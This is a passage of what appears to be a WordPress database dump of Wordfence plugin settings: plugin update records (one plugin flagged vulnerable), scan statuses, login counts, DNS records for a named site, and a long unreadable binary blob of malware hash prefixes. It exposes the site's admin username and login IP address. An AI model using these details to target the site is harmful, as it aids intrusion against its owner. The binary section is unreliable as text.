romVersion\";s:5:\"7.7.1\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:10;a:5:{s:4:\"slug\";s:10:\"maxbuttons\";s:9:\"toVersion\";s:6:\"7.13.1\";s:11:\"fromVersion\";s:3:\"7.9\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:11;a:5:{s:4:\"slug\";s:10:\"wp-smushit\";s:9:\"toVersion\";s:5:\"3.3.1\";s:11:\"fromVersion\";s:7:\"3.2.0.1\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:12;a:5:{s:4:\"slug\";s:22:\"swift-performance-lite\";s:9:\"toVersion\";s:5:\"2.1.1\";s:11:\"fromVersion\";s:3:\"2.1\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:13;a:5:{s:4:\"slug\";s:11:\"updraftplus\";s:9:\"toVersion\";s:7:\"1.16.17\";s:11:\"fromVersion\";s:7:\"1.16.12\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:14;a:5:{s:4:\"slug\";s:9:\"wp-cerber\";s:9:\"toVersion\";s:3:\"8.5\";s:11:\"fromVersion\";s:3:\"8.4\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:15;a:5:{s:4:\"slug\";s:15:\"wp-file-manager\";s:9:\"toVersion\";s:3:\"5.4\";s:11:\"fromVersion\";s:3:\"4.6\";s:10:\"vulnerable\";b:1;s:4:\"link\";s:41:\"https://wpvulndb.com/vulnerabilities/9446\";}i:16;a:5:{s:4:\"slug\";s:12:\"wpforms-lite\";s:9:\"toVersion\";s:5:\"1.5.6\";s:11:\"fromVersion\";s:7:\"1.5.2.3\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:17;a:5:{s:4:\"slug\";s:12:\"wp-mail-smtp\";s:9:\"toVersion\";s:5:\"1.7.0\";s:11:\"fromVersion\";s:5:\"1.4.2\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:18;a:5:{s:4:\"slug\";s:13:\"wordpress-seo\";s:9:\"toVersion\";s:4:\"12.3\";s:11:\"fromVersion\";s:4:\"11.0\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:19;a:4:{s:4:\"slug\";s:6:\"gotmls\";s:11:\"fromVersion\";s:7:\"4.18.76\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:20;a:4:{s:4:\"slug\";s:15:\"disable-xml-rpc\";s:11:\"fromVersion\";s:5:\"1.0.1\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:21;a:4:{s:4:\"slug\";s:24:\"disable-xml-rpc-pingback\";s:11:\"fromVersion\";s:5:\"1.2.1\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:22;a:4:{s:4:\"slug\";s:24:\"famethemes-demo-importer\";s:11:\"fromVersion\";s:5:\"1.1.2\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:23;a:4:{s:4:\"slug\";s:24:\"google-sitemap-generator\";s:11:\"fromVersion\";s:5:\"4.1.0\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:24;a:4:{s:4:\"slug\";s:12:\"ip-geo-block\";s:11:\"fromVersion\";s:8:\"3.0.17.4\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:25;a:4:{s:4:\"slug\";s:18:\"better-wp-security\";s:11:\"fromVersion\";s:5:\"7.4.1\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:26;a:4:{s:4:\"slug\";s:29:\"limit-login-attempts-reloaded\";s:11:\"fromVersion\";s:5:\"2.9.0\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:27;a:4:{s:4:\"slug\";s:9:\"loginizer\";s:11:\"fromVersion\";s:5:\"1.4.2\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:28;a:4:{s:4:\"slug\";s:15:\"login-recaptcha\";s:11:\"fromVersion\";s:5:\"1.6.4\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:29;a:4:{s:4:\"slug\";s:27:\"remove-xmlrpc-pingback-ping\";s:11:\"fromVersion\";s:3:\"1.1\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:30;a:4:{s:4:\"slug\";s:18:\"wp-simple-firewall\";s:11:\"fromVersion\";s:5:\"8.2.2\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:31;a:4:{s:4:\"slug\";s:19:\"visual-form-builder\";s:11:\"fromVersion\";s:5:\"3.0.1\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:32;a:4:{s:4:\"slug\";s:9:\"wordfence\";s:11:\"fromVersion\";s:5:\"7.4.0\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:33;a:4:{s:4:\"slug\";s:25:\"wp-geo-website-protection\";s:11:\"fromVersion\";s:3:\"2.6\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:34;a:4:{s:4:\"slug\";s:13:\"onepress-plus\";s:11:\"fromVersion\";s:5:\"2.1.6\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}}','yes'),('totalScansRun','432','yes'),('wfKillRequested','0','no'),('currentCronKey','','yes'),('wf_scanLastStatusTime','0','yes'),('wf_scanRunning','','yes'),('wfScanStartVersion','5.1.3','yes'),('lowResourceScanWaitStep','','yes'),('wfStatusStartMsgs','a:2:{i:0;s:0:\"\";i:1;s:0:\"\";}','yes'),('wf_summaryItems','a:8:{s:12:\"scannedPosts\";i:0;s:15:\"scannedComments\";i:0;s:12:\"scannedFiles\";i:0;s:14:\"scannedPlugins\";i:0;s:13:\"scannedThemes\";i:0;s:12:\"scannedUsers\";i:0;s:11:\"scannedURLs\";i:0;s:10:\"lastUpdate\";i:1571971175;}','yes'),('scanStageStatuses','a:11:{s:13:\"spamvertising\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:4:\"spam\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:9:\"blacklist\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:6:\"server\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:5;s:8:\"finished\";i:5;s:8:\"expected\";i:5;}s:7:\"changes\";a:4:{s:6:\"status\";s:7:\"running\";s:7:\"started\";i:2;s:8:\"finished\";i:0;s:8:\"expected\";i:2;}s:6:\"public\";a:4:{s:6:\"status\";s:7:\"pending\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:2;}s:7:\"malware\";a:4:{s:6:\"status\";s:7:\"running\";s:7:\"started\";i:2;s:8:\"finished\";i:0;s:8:\"expected\";i:2;}s:7:\"content\";a:4:{s:6:\"status\";s:7:\"running\";s:7:\"started\";i:1;s:8:\"finished\";i:0;s:8:\"expected\";i:3;}s:8:\"password\";a:4:{s:6:\"status\";s:7:\"pending\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:1;}s:13:\"vulnerability\";a:4:{s:6:\"status\";s:7:\"pending\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:1;}s:7:\"options\";a:4:{s:6:\"status\";s:7:\"pending\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:2;}}','no'),('lastScanCompleted','ok','yes'),('lastScanFailureType','','yes'),('scanTime','1571971176.2544','yes'),('originalScheduledScanStart','1571760599','yes'),('autoUpdateChoice','1','yes'),('totalLoginHits','62258','yes'),('totalLogins','63','yes'),('lastAdminLogin','a:6:{s:6:\"userID\";i:1;s:8:\"username\";s:12:\"pentadbirweb\";s:9:\"firstName\";s:0:\"\";s:8:\"lastName\";s:0:\"\";s:4:\"time\";s:28:\"Tue 1st October @ 05:26:13PM\";s:2:\"IP\";s:15:\"115.132.144.171\";}','yes'),('totalAlertsSent','64','yes'),('lastEmailHash','1569921973:0fbf81d31dd05b32df5979cf12986e38','yes'),('lastNotificationID','1097','no'),('lastScheduledScanStart','1571760746','yes'),('wf_dnsCNAME','','yes'),('wf_dnsA','bintara.com.my points to 103.6.198.69','yes'),('wf_dnsMX','bintara-com-my.mail.protection.outlook.com, ms47482536.msv1.invalid','yes'),('wf_dnsLogged','1','yes'),('malwarePrefixes','‹\0\0\0\0\0\0Öy8ï\0ðÙ—»Î;Ë½sIYJ…ŠBR$RI%QŠDÙZHJ!I+…J”¤H‘Š”´i!*)¥EE+Ò&~ßßŸçœyžyßç3çÌ3>ãÇŒ\no>^×ß\'Ì_wBØx³1ãuO¿\ZÞÿ Õ%ïe\rÉ?ðECËÄ)¥³ŽM¾>í²Í8)ûÿ}–ãu×„ú-XïöÿË1ff–æÿm\0–é\0øý\0Ýràa?\0xG7\0?Û )ûô`‘\0ö4ÀÖDÂK@ÜbH½\0Y®+ gZ\0¹p\ZÏê¨›‹\0êß@1¶Pt„ô¡€180å\0ûv6ÀÙÈ. à);€÷¾ð§´Õ¼\Z@U—	¨Ó{\0uŽ ¾\'ÔÏîÂÌ@p_ö€F»Ð\\q4·Æ\0Z.=€ÖÂ_€ö\r0h²êíèŒït&Õ:A‹€!·í\0]ýß€î¤\n@7è\0 ûb? gè]¬–ÙÛ;€aÜl`Ø,[À0ì`¸í`xý,0ü`00¼¯aŒ˜ñì$`d½0Z§U\\\0Œ>ÍŒK>Æï&¶)€Éæ/À¨S5Àè½)€;0ó­€r°Ø=	›»7ë?î±À¸ë­À¸º`\\C`9Þ°*XXÕ€Õïd`üÉ~`‚6LˆXKþÖ—_ÖW–6$`Û÷°»¸˜t¦˜t/˜<$p8·7ŽOÓ\0§ü`šm0mà‚.V!ÀôÝý€kH,à\Zý˜ÞÌHðfœ~Ìx8˜9½˜•ü˜uúà6~à–…³Žî«\\÷Ÿ¹À\\§`îÃwÀ<Ç:`^s0Ÿ³\0,?\0,H{\r,8ã,(N\0\\Y\0,øžx,þxä¦\0žcO«Ó€gö#`¡½-°Ðuà¥­xx›s€·/à]˜\0,¹%|ˆë€ãøl¼øª0À÷,õÔ–Y·ËÖþg×8`Ù×À²Ñ€Ÿìàçžø]ôüêCå\'v\0þkÜ€\0É& `O,:	X©˜&\"@`çH hú4 8ZÇÁÜÕàs`õÞIÀ\Z0XÓºÙ›„A@XPv¹/6\"°J bé\Z \"k\0X§¯Öõ:ëýï\0¶†‘—Q òU5d•DG]\06=]ln¶X†[VÁ@¬.ÄE±ÿ½»Ø$ˆ½·Øúó°õ.°-©Ø¶ï,°íù; ~Îj >éŸNñuç„µù@BŽ#8ºHÜ7H|;Ø.v„¬’œ+€$— i‡?°sä ¹+\nØõÊ	Ø,v4{—Àf7°gëo`ï§ûÀ>Ùw`ßÈ^`_ïN`­R<æ)AÔ=ÉÀqÀ—R M÷6f0\nH—/\02ÆK€g; Ãc\"9P²0%k€ÃÓ¢€ìá™@¶ßD gß= çž3pdQ!p´ý4p¬YäÖÜòÀí@Þzs ï£×çœpÍN\Zþ\nŒó‚t_àT£pª[B±@¡ñI pþm ðá\Z °=(ìžœn»œ1\ZœY\Z{¬Š—{%\'Fç|¦\0ç*^¥&Àù™•À…)ÚÀ…í‰@™ü(›2(OR£³€Ë§ª€Ëw&WÞæ\0•“` Òm=P¹2¨Õ@õôk@õF :ñP}®Õ|®×Ù7:†µ†£€ÚS÷€ÚÛç€[9ZÀ]¸r¨Ó™\0Ô5G÷f6\0÷|åÀ}E$pßð@¿xxx8û2ððÄ/ Á4h¸txtöÐ8S4¡Ï€ÇcÃ€ÇQÀãGîÀŸ§À³Í^@ËÅ6àyì à<xaj¼Øû\rxi9x9Y	¼Ü^¼¬^KÚ–ºmébàµ·=ð:$x1x;rðö²)Ð®c´¯\r¼ŸÐ	|hK:ÌO|€Ï»u/¶³€o‹¢ïç§]ËöÝÀ# [Ïý?ñ@÷Â@ ûˆÐã=í\r¿_…ðÇ¾ø›Uüý¶è»÷ø7c\"ðoN)0 ‚K€àµK 4M„ò?€Ð§û |„c¼@ÄºDöº‚h¼-ˆ/1\'ÄþÎq¬Ä†xÔx6$/ÍEÖ. Èë8(Z;]ŠË¢@ñ”@k@Éð$P2Ù”†ß¥[ß€2»hPöu:H¥DƒTû3¦Ë@f¿\'È{²Íù G¤‚ÜºP¥‰\0UûAUR\0¨ÖêÕŸ€ê‹é úÞ~P-…E© °n8¨™Ujé¥ZÃƒZó|A­ÆM ¶~!¨íUj?ùj?{*›\rêèåƒ:›²Aš-ààÀvpp¼)8D³¢WêZ;º¯úÛÓ@WÐÀóhðò84-zq	8lé0Ðp®4ÌN\r_[€ÃÙ\ràp?8¼X’Ž¸œ\Z}M\0]AãÙ;Aãñ 	”šÈÚ@“8ªÑõë.8\Z\\šŽ}šZÍÂï€æà Ð¼·ë³{*gp·b8®í\0h9v>h¹ûh™5´šø´JN\0Ççéƒ‚û@k™h½þ\rh}À´þ¹´ÙÚìlmN^mÊAÛoEàÄ/ã@;ç~ÐîU8iÑ?Ð>&œÌ/\'?O\0§|D@§@\'pZÙÐÙz!è<ù8=‡]#~€3g‚3¦G‚35\ràÌ+GÀYn€nÁÙ÷€î_A÷œ±àð!8®çºXƒóôÓÁyEÁùêÁùéÀùÿüÁÎà‚È\rà‚$%è!o=†ï=êŸ€­– g…¸pÏ\0¸ðœ/¸°y¸híApQå\ZÐK²ôš´ô:R.¶ß.¾üôn‰—äçƒ¾‚K=ÓÀ¥G·‚KóTà²kÐþúeW¸d‚+ÞOW|ëý7]W>ØžÆÁÀG0Ø¢®²4W]\0WÝX	­…å‚Á{0øµ’?^†½X†uÇ€á#ß‚ƒÌÁˆŸ¶àÚõ!àÚM¯Àu+>ëªöƒëošƒQ>Á¨3öàFø4¸±Ë\0Œ^5	Œ>”	F>nú¡Æ\\]Æ< ÁÍ\r\npóÓLpó«à–+àVf=¸uº7¸mú2p[êWpÛ‰}à¶\'0nb·ÙŒ·Œ\0ã÷€ñIÕ`Â’,p;¿Ll§Á6¡àŽGÁ¤X)˜ÔÜ&¯œ\n&§?w}H÷ø·‚{{æ‚û´‡ƒûæ=\0÷ß¯÷*S—x€©-ŸÀeàû`Ú‘+`Úýr0í©\r˜>hxpõD0ã[=˜éè*pç‡·^\0³RÀlU˜Ýž\0æ„\0sþŒ1›Ác/÷¹“U`î\"3ð8_R\nÿøÌ›˜\0æ5žóþöù÷ËÀüëÁ12° y6Xú,ø»<µxêÃ9°Ðì*XX÷,ò™½`Á3%OÀ³²MàY+sð¬¿<»&<ûÛ\r,60K˜@°´0<ï·¼0lXÆõƒe¹3À‹J°B¶¬0«+æ.+Âgƒ—–„€—)7ð²gxyÕEðŠñ\\ðŠ×H°«+·«FE‚W¿Œ«Ço¯¹?¯E<¯Ï×kòCÁšÿ9u¼ý¬5¾Þô¼½,¼ªÞ®©o÷‚wuç‚w‡^ëÆ¸‚ììÀ‹–‚\'‚‘àÃÿêÐ ï	>\nj¶\0}qw§ƒ=‘`S½=ø-ë{(À\'oÁæià³$l‘õƒ-#g€Ï×/Ê°µž_š$ƒ//Ô‚¯ü+ÀWç?€¯žãàu\0øœ	¾s°ßµ•ïz§ƒïùµà{›^ðCÒðct<Ø1<\0ìv”¹çmÀONÖà§ÙÙà§sÎà§Û§ÀO/ëÁÏ ø¹¦üò~øU´ü>}8ø½X	vÅ]»:°ÛX\nvï{öDÝ{ËN?ã1ðçïbð—×oð×2_ðWÀvðW¶ø«u6øûÂ\Zðï#ðïÃà?Ãõà¿²0°Ÿêûk;ÀW; À“†€47CàÝìp† #ºÁ\n{ž0\0Áv¶|ç„!Äb9„.y¡ l×¯ºæ1€ˆm#!rû\'ˆ¼\Z\n‘!Ñ¼XH²%’:+!é©«ôÆ[HfÉ¾\\€äSÅü•-D\ri…¨ã\'!…»¤hÙ)1Rj/€”w, Î¬â“Û!õ?H0ý	VG!a»$ìð…49¯ ­wAö4_HG{¤óO\rÖÞ\röt‡‡<…ß{\rù÷ÒËŸé}Üé»‡ôW¼‡ôwo„ô¿˜@CÇÖAÃÜžAÃ|AÃJ¡a—» Ã‚+Ðˆ–5ÐÈYrhäÝ#Ñä\ZÈèŸ\n2î%!€Fi-†F‚F\'¾ƒLß4Bcd%Ð˜+ 3ŸdÈœ\" ±ê]ÐØ-éÐ8ã$È²p*dYÆBV¾@ã\'éC,t Û$dmÙMXÙ— ûÃk ûìóÐ»EÃrHQBŽsS ©iÙÓhÚª«³û7È¹ð;äà¹lš\0¹¼\0M\'CÓùhúÅ.ÈÕ³r]=rÝúr}òš5*š=ú$4Oè†æ_<	-øï<ÚC $äIxAžs]¡…Â4há„ÐBo3há=Z4|=´è±+´èÏSÈ«v\'äí”y§ZCK<ÇAK²ã %Õ«!Ÿ!ë ëxÈ×}ò¼¡¥\Z ¿›ß ¿7w å‡â åOfB+Ö\r@+chåž…ÐÊ»Ã¡•o@+{CöéP`Å;h;Z5ÍZÕ¤‚Ý à\"h5­v7…V—‡B«/–Ckà¹Ð\Z×PHÖ(t:…Þ_…ø…d (Âé!±÷;´~ÔhýR	ù,Š	5…brnA›‡VB›+>A[ìïC[w|…â,= I$”03JØ9\0%ü˜\nm·j†«•ÐŽ˜(É´Jšì%mý/¯%½ú\n%_‡vM¹\níºòÚíqÛí¹´ÚóÇÚOA)g_@)/Ú Tq%tÀâ”V˜¥O|\0LºÌ	Ì\ne¸ÅA™fYPæ„(óñèð9Oèpçy(kH”kåøèCG8tditäØèÈ“è(g³»{ûk	_Ò\r?~ÊûøÊ·Ì€ò#G@ùCùwÖC\'à_Ð	‹ŸÐ	—YÐ‰´[ÐÉ¯¡¨*ØZj}	êB…ÏCEˆTä9*Ú>*ú	Ag\n~CÅŠ÷Pq¨*Þ?*)Ì‚JN†Î¹* swæC¥cÊ ó›pè|ž7tþÔTè‚è2T€AW™A3äÐ%/	tÜ	UM_U½q®n]]M•BÕG k	‡¡k§¿C5žÐ\rãïP­Gts÷cè–ÁLè¶XÝí9\0ÕiŒ :Ó èÞ:º×®Ý°€Ð º¿ zÎªj=ª›5nó†·\'BOý@Í÷ë çË@èå¿uPwj3¢ ¶%YÐkê\rôzÊèMÆzèmrÔ¾9zÿÇúqúðÒúðeÔ‘iuš\nuzý€:ãÊ O×Z Ï~MÐ—šãÐ×øoÐ·ýFÐ÷ÔN¨ërÔí	uÇüƒº“µ î{_¡ks¡Þ3zPoUôsÕmègýaWA<R >í{Ð¿žl¨¿FêïÃa4…Á©q0”z†mü`¸¦FôžÁˆÑuËw‚±ë‡`Ü&Æ/Ã„ùr˜ÝÊÿÜ‚I`L¦–Á¢‘‰°(»	µ³°¸[KM†%\'ÁÒKÉ°ô±,\nËö¼…eµ?a:*¦_„•F7`e”VÂÊ×&0C‰`N‘s‰‡`ÕâË°ê×qXX’ÅÎ°ðt5,4Á\ZûdX³Ck¯ºš:\"‚u|&Á:mÇáÁ›Pxð²}>¬»î!¬—Ðë]Üë›{ÂCÅðÐÊýð0ä<¬Ý6t>ï<\04˜\0™Ý9\r½`£Ol\\k	›|÷ƒMþYÁ¦^ž°¹$6wþ›Ÿh…-ú¶ÀV6k`«¤Eðø¸x|É=ØºðlSÛ4¿„mþ6Â¶_ÂíRà‰¥ðÄ—ØnÓ>Ø~°!<9¼vˆ};\\4…\rÀS¯o…§™iÁÓª_ÂÓžR°³Î(ØyÂ\rØ¹èìB?†]£ð*žÑqž	ü‚gN¼\rÏô0ƒgfngÅÀnR`·‚ðìëbØýÌxN°<×PÏó=Ïwœ/Ø¬‚=`]x¡Õxáö>xÑ¹¡°WÉ?x±Ë}xñ[öÖ.ƒ—|t‡}F$Áÿ•öqx\rûô0°ïùPxéíÝðÒCáešxxYåjxYÕ+ØOoìU	ûåÀËï\r‚ýKõaÿ–°ÿg\r¼ÒÐ\0^Ypë	Ú˜ÃkÿÁ«\ZÊà`>Þ¸^=ê¼æE²çòÌµ}AÃaåŽpØ[çÂómáˆ³YðºîÇð†’»p¤±y1	Ž¬©†#ûoÃQ3]á¨Â8êt¼1ù¼1¥ÞøÀÞøñ¼Éló!Žù˜Ç‚×àØÝ¼õÌ;x[Ä(xÛ6Žsy\0ÇøÇW-€ã__ã;†ÃÛhxÇ‘›pÒ´hx\'ðÞ>ÞåvÞ#ÚïyõÞ;é8¼÷ãx_ï{TïIÀû§‡Sà¶qðkà¹Cà7‹á4[N[ë§_n€Óo”ÀéÍ[àƒß\ràs78c¥6œÑågš	gf¬³K:áœÛá#áMð‘£>ðQ¦>zÅ>f³>îLÁyGà¼ëpÞ£ùpþ ×ð	\"\n>‘p>Ñ÷>©ß	ŸôŸ¼íŒ,‚Ž;Â§NØÁ…]YðéE›á\"ãHøÌ°£ðÙšøìmK¸¸..Yu.ù9>·r|þÙ<ø¿.cÏÃSþÀ‘\rpÅí…ð•!p•m\\uæ!|õô1øZâ%¸&g.|£º\r®¥ÂµñýpíþvøæüÅð-#ø62¾ckßqkƒëìžÃuŒàº.søžØ¾We?ôq†<‚–Œ†ëm@¸>ÚnØ7ÄoîäÃâVÃM£ZàÇ§ÖÀOf™ÀÍ»õàæ¿ág5üÜwü¼Ö~Q9n=LÀ/=àW+õáWý?á¶UŽðëHøÝØð»¸^ø]ö-øÝß«w¿Ã‰6øãXøãÒF¸óª;Üù~)ü©oü5x*üõÍoøÛMgø»w±r¸ËÃ\rîÚow½Ûw?6…{\Z÷Á=ísá1ËáÃ½:‘ðÏË«à_Ã#à_»\'Á¿Ìá?^•ðŸKøï¼#ð_ïÍpæ¸?[<Ý\0´†>Ø\"@ÌnÈ>ÀÔ7©‹ So#hÊ}=Á¦®D°åí^q!ÝD<9\0ßND$·!’æ/ˆ´R‘¹9!²ã·ªæ&¢¨MD·Úu$Bïÿ…ÐOî#Jî¢œýa‘L„}ØŠpÖÁošŽðG_ ªsWÕõND±QçGÅDxv\nÑ²ûŽhE× ZÿmÍLD»¨Ñn_‡h\rD‰® ƒ®ŽGt¾ýCt~5\"ƒ§¢ÈàÅˆÞoDïãDßà¢ÿG1ð{ˆ´NF†>ª@†!©ˆ!º1…ÿšŒ\\w1\nŽ@ŒÖš\"F}çãvˆñÆÈèŸ¦ˆ©}bÚ¸³â\'2fà>bVe‚˜K& æ^oÅ]Ä\"u\'2Ž¼ŒŒ[jŠŒ‹š‚Œ»X*G#–­g+ub†Øè©ÄÆß	±%Ò‰u}ˆÝ\\dÒÚaÈ¤c+{{	2e¡âàðq˜{q(õFë†!N:ƒi›aÄyCâ¼c*â|<q>¿q¾rq9}™î<™^õ™þù	2£¡™ÕŠÌü¹™%Yª¹ˆ[¨7âþ1™3ú\Z2ÇÅ™»j\"2÷B\Z2÷½)2··™§úÌ3²Dæï¹‡Ì¯Z†,È„x„ø!a%ˆgäÄsƒx›‰,Ü¾YÛ!^•Ûo¬ñÍ@¼×#KjZßÜ	ÈR}CdéüUÈÒØCˆßÚ2Äïh$â—gŽøõ¾A–¿ +NÞBüUYH€*YÙ½	\\ð	ÌƒžòFëmUž?UÙ4þ(Ð†ÇE‚OÿBV§îEV7CÖLÄ‘5Gí	)X‚„N[„Ö¤#áKA$âúZd­n²nîsd½\"Y‹¬¿T€l\0­‘hó$:à]q‰qöG6óáÈ–)…È¶ÅÃ‘m)ó‘x×j$¿ƒ$,Z‹$¬þ‹$$E¶—íÍw7J‘$Õ,$é’\r²s¬Ù¹ñ’|ñ’ÜÃ\"{œ¿!{Âu½“W {ž#{?mFö]@öSÏý¿> ûÿ™ )‹Æ\")¾’«¤\ZERçÎCRï7\"\"Î Þ#i[Æ uäàä$$sÛxäÐ¸ñÈa«.äpb3’uŸE²¿: Ù½™È{äèÞ»ÈÑ‘£ÕÈ±²³Hî6=äøÉã†!yb‘“J9y¡9Ym‡ ÈiÑE¤hrrÆá\0r&Õ\n9Sø9kô9;ë3rö„R<Í)ÑíEJš,s}<R:ë7Rê>¹P›‹”Í¡‘²¢gHÙýD¤¬¡¹8®¹¸érIã„\\?\Z¹<B.§!W^k#•§® •wâ*Ã&¤*°¹:aR½%¹NmDj†¯Gjân#7:JZ­õHíËHíoä¦¤¹ÙŽ ·¥!ÈÝÔQH]¹1r/[¹÷{\'r¿-©Ÿ•Š4Øö#ŽU\"Í5H“í¤)ŸG{ÀÈ“Ù7‘§{¥ÈÓÞ…Hó›õÈ³,K¤eÈ$¤Åù1òÂ¿yy«yEø!mâ™H›ñ8¤íÎ\Z¤­eò&Nykóy»ÖywÀy×ê´K;öâýH{m?ò8…¼C‘÷çò\\òñ¿úv¤=D:_”\"ŸV|C>½³@>ƒ8òÒB¾,[†|)´B¾œ­@¾”.B¾Íþ†|ûÑŒôÿF~ÌüŽühÔ ½óÞ€R¤7Íé-›ü4{…ü>zù}¦ù£Uüñ¬@þ&; }K¤Hß3äöé²	é_péo»ŠÀ¿™(øü\'\nu¥£°:	Eîú èÊ›(\ZøEkÕ(®tBqÃû(Y‚Š†¯EÅ¢¨Ø´•¼?‰Ê®ODåª¨ªB•3ÚPF/e>c(Û‡r#¼P÷pTsÂd5Ü¨A‡<~‹êŠÊPÝq*T÷‘/ªÛ2Õãß zëP½œRT¯ñ7ª?•FõåèÐìÙ¨¡Aj-B‡ûCGOGÏ¨IúqÔäª:æõlÔLP¢f»ÚQ³C‹PB-¶÷¢]jñã5:¶í\":ÎÁ7ó\"jù\Z@­\\ï¡Va7Ðñ{eè„•¹¨5¢ÖÏö¡¶cÝQÛ}cÑ‰ÂÔ>ˆNÞ²Ç¡ïuPÇ™CQÇë:èTÍgÔiÕxtšÌ¶=u)ŒB]Î¶ Ó±2tºz=êúx:CtÉ–¢n¥ž¨[e;:›˜€Îžzu{	S¨Î[ŠÎëšŒÎ|Ž.0¹‹z² ê¥{õzTŽ.Þ=\rõÑ’£>½E¨oéÔ÷6ºÔÅõ[rõk‹DW4ŒEý³¾¡þö¡þÍÛÐ•ƒþ¡+=î +ƒ`te¯>ºŠÚ„®JnDƒôÑÕ£o «/;¢!c×¡¡Þ›Ñ°\'4|G,\Zžû]kþ]?è-º!xºá¤\ZI8£‡÷ \'ïE7èÆ\Zi.B7»¼E7ç£èæ/1hlc9º5e\Zç*G_¡	±SÐí_ÐÄ/¾èŽ[SÑá5hòLc4ù†šÜ%CwÅÐènE\rºÛ>Ý}åº7nºo·ºÿ‹5š¢wM1´@SÎmBS®X ¦ÝBS£®ÜGÓœÑ´}Uhº‘z0V„fì|†fêÝ@3ÿÕ¢‡l|ÑÃ#ÃÐÃ\nÑ¬1uhÖ­ÓhVó4g„æŒM@sâ\"ÐœìX4çe(šóa$zôd4š»­Í-ÑEžˆæ­(Fó²–¡ù3tÑ|ÿ¿h~ô4¿Í=qFOôíCOæm@X-ÐŽEÆ¬CNÌFO­¯BO{FO¿?ŠÇ$£%þè½½è…ÄZôBû0´L÷\rZæt-›u-+üˆ–×ë£·­G/÷e¡W¾¤ •Ÿ\\ÑÊÞ·èUýèUýèÕaNh5´­ÖrF«+£ÕkÐk%Íèµ{‹Ðk_Õèõ·ÕèõžXô†üzãbZkí€Ö®qBoRèÍË^èÍêzôvä(ôÎš«è½­è½}­è}Wz?&\0}([†>\\‹>’h£IÚØaˆ6þ‰G›¸õh“mÚT€>‰ÉGŸÂuèS¡è3}Vbƒ¶ì”¢-® Ïw½GŸŸ9‚¶®z…¾ôýOr\"ú²5}5¶}eÝ‡¾Zÿ}Õþ}=¾	}=ëúúQ(ÚnrmŸô\Zmcƒ¾OtEßßÈD?ŒÉG;lÐG/´có´ã,‰vú}B?Ÿßƒ~þ<ý\Z‡~i°F¿jMF¿ê_D¿ÍF¿›F»˜\rh—æÚu§íºûíúÈ£Ý£œÐîCÐîs«Ñžâô‡Ã/´×¥ý¥Fÿt¼Bû‚æ¢ÿÖßCû!S´TÚoÖöGÍ@û3¦£ýùè\0RŠ­O0¤\ZÅÐá–cX{†ý‹Àðò_~?\r#Ê]0âæ;Œ¬vÄDðyLlž„‰}Â0ñ²lLb`‡IâÎb²•w1Ù†û˜ì€QÌyŒqS\Z¯Ä¸32Œ/?©jžbªßN˜zô-L}ÄS·…aš®S˜æO¦5ì¦­ç‚içbÚU‹0íë	˜ÎSslˆn¦{ Óƒ0½Õ?1½¼W˜Þ×I˜ÁÁHÌàÈSlhB\"6,~\r6ì[fZŒ\r÷/À†_˜‹°*ÆFûƒü[Oæ°Ñ5¡Øè/©˜©Ö Ì´&c²³/k¾{à663\Z[þgò×TYÀ,Ãõ1ËÚl¼ÉLl|­-6a¤	f3î/f3ëfË¿Âlí1Û¨ÿòôåØÄá¾Ø$ö6©ô6i ³×Y‰MY€M)ù9™aŽmŽØÔa7°©¡C°iŒ6í†;æ’2sùHa®?‚±ªÁØŒ#§±Y5 æ&ÁÜ¨cØì¸nÌsÁæôgbså+±¹†ýØÜßžØ¼Ò7Ø¼o?°ù6ÿq)¶\0¾…-h×Å<Æ÷asÛ1ÏÅ=˜çÞ˜gÁRÌó¹æùÖ[¸S…y±±Åƒa‹—žÁ¼Ó°%?ß`>ŽK°eƒÞaË&]Àü—b+z³°€!ñÈû‹­tÞ­|5|q|{[5e4ò”ý:„Ë\\±àg$Bta!Þ±ò×X¨‡…¾LÀÂªî`ágŒ°ˆá³±ûuØº‡±uñØ†Ç½Ø†g±\r_œ±È]ÆXôˆÃXôÉõXtq>¶‰Ü„mª…m€mN8m>tÛüÁÛ²Û‹=šŽÅþõÇ¶fÍÇâôZ°¸I\rX¼xÿp=–ýK¨þŒm—çaÛUúØö*¶½é–x;Kìý€%Ý·Ãv¦ŸÅ’ÃYlš‹í”b»£plÏ”5Øž§ÅØ¾